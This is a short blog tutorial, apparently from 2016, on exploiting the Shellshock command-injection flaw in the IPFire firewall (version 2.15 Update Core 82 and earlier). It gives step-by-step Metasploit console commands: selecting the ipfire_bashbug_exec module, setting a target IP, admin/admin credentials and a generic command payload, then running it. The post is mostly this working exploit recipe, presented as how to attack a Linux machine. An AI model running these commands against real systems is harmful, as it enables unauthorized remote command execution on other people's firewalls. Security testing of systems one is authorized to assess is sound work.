Exploit Linux PC using IPFire Bash Environment Variable Injection (Shellshock)

at 8:23 AM Friday, June 24, 2016
IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request header

Exploit Targets
Ip Fire 2.15

Requirement
Attacker: kali Linux
Victim PC: Linux


Open Kali terminal type msfconsole


Now type use exploit/linux/http/ipfire_bashbug_exec
msf exploit (ipfire_bashbug_exec)>set rhost 192.168.0.176
msf exploit (ipfire_bashbug_exec)>set username admin
msf exploit (ipfire_bashbug_exec)>set password admin
msf exploit (ipfire_bashbug_exec)>set payload cmd/unix/generic
msf exploit (ipfire_bashbug_exec)>set cmd uname -a
msf exploit (ipfire_bashbug_exec)>exploit          

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)